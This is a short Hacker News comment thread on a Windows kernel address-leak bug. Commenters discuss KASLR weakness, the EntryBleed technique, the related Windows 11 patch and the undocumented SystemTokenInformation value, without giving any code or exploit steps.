KASLR is broken anyway, at least on x86, even with KPTI (a Linux feature to mitigate Meltdown) enabled. See https://www.willsroot.io/2022/12/entrybleed.html, which still runs fine (with some modifications depending on the microarchitecture) on the latest AMD and Intel hardware that we've checked.
by KyleBerezin
1 subcomments
I find myself thinking "wow, what an obvious bug. How did Microsoft not catch that?" but then I think back to some of my own extremely obvious bugs. Thankfully my code is much lower impact.
by mkolassa
1 subcomments
It’s interesting that the KB that patches this on Windows 11 (KB5063878) is the same one that was tied up in all the Phison SSD drama.
by Jare
4 subcomments
I went to check when the bug had been patched, and was left wanting. I however lack the expertise to really appreciate how much danger exists in practice, or for whom. I just know I do have Win11 24H2 and "This leak primitive is particularly useful for Windows versions 24H2 or later"
by dcrazy
2 subcomments
I can’t find any mention online of the `SystemTokenInformation` enum member outside of this article, even in this otherwise very comprehensive collection of documented and undocumented values: https://www.geoffchappell.com/studies/windows/km/ntoskrnl/ap...
Seems like SystemTokenInformation might be a very new addition, possibly even Windows 11 only?
by lysace
1 subcomments
Random: Perhaps that full source code leak in 2004 actually helped harden the kernel, long term?
Hacker News